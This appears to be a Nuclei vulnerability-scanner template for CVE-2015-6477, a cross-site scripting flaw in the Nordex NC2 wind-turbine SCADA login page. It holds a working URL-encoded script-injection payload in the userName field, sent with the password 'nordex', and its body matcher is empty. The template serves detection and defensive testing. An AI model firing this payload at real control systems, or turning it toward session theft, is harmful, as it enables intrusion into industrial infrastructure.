id: CVE-2015-6477 info: name: Nordex NC2 - Cross-Site Scripting author: geeknik severity: medium description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html - http://seclists.org/fulldisclosure/2015/Dec/117 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-6477 cwe-id: CWE-79 epss-score: 0.00277 epss-percentile: 0.64954 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nordex product: nordex_control_2_scada tags: cve2015,cve,seclists,packetstorm,xss,iot,nordex,nc2 http: - method: POST path: - "{{BaseURL}}/login" body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en' matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: word part: body words: - "" # digest: 4a0a00473045022100f172e6a8b04574670491e79e79a2c9354eb33e7efdcd15e04ee77d95c0d065e602207e351f4b898601051e7cc3a381f3a71ae71cfd449968bc2d3808cb90fc44b49f:922c64590222798bb761d5b6d8e72950